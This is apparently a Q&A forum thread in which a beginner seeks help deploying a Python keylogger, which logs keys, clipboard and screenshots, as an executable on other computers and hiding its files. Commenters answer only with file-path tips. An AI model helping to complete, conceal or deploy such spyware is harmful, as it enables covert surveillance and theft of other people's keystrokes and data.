# How to make this file execute on another computer - how to have a changeable path?

Tags: python, windows

I am trying to make a keylogger, it works on my computer but when i turn it into an executable it gives me an error "Python failed to execute script keylogger" I think its a path problem because its static and every computer have a diffrent directory, i am a beginner i could use some help.

```
files = ["log.txt", "info.txt", "clipboard.txt", "screenshot.png"]
dir_path=r"C:/Users/messa/Desktop/Python keylogger/"

##This function to take a screenshot---------------

def takess():
im = ImageGrab.grab()
im.save(dir_path+ "/" + "screenshot.png")

## i have multiple functions tell me if this is not enough .
```

---

My solution idea: I tried to check for this path if it does not exist i'll create it, after creating the directory i want to create the files in this directory, but it gives me a permission error " PermissionError: [Errno 13] Permission denied:"

```
extend = "\\"
dir_path="C:\\Users\\Default\\AppData\\Local"
Path(dir_path).mkdir(parents=True, exist_ok=True)
files = ["log.txt", "info.txt", "clipboard.txt", "screenshot.png"]

for file in files:
    f= open(dir_path + extend + file, "w+")
    f.close()
```

Comment: Your path is absolute. On another machine, the path will be different.

Comment: Try with the relative path https://stackoverflow.com/a/34275921/2669814

Comment: i'll give it a try, thanks.

Comment: check my edited post @ikdhruw

Comment: What should the path be on other computers?

Comment: "C:\\Users\\Default\\AppData\\Local"

Comment: well lets say i'm bad at general computing, what should i do ?

Comment: Take this question to a place that is for questions about software and general computing. Like Super User. Stack Overflow is for programming questions.

Answer (score 0):

You can use pathlib module to get a stored location

import pathlib

dir_path = pathlib.Path().absolute()

Comment: I want to hide the file, i stored the path and then i want to change it .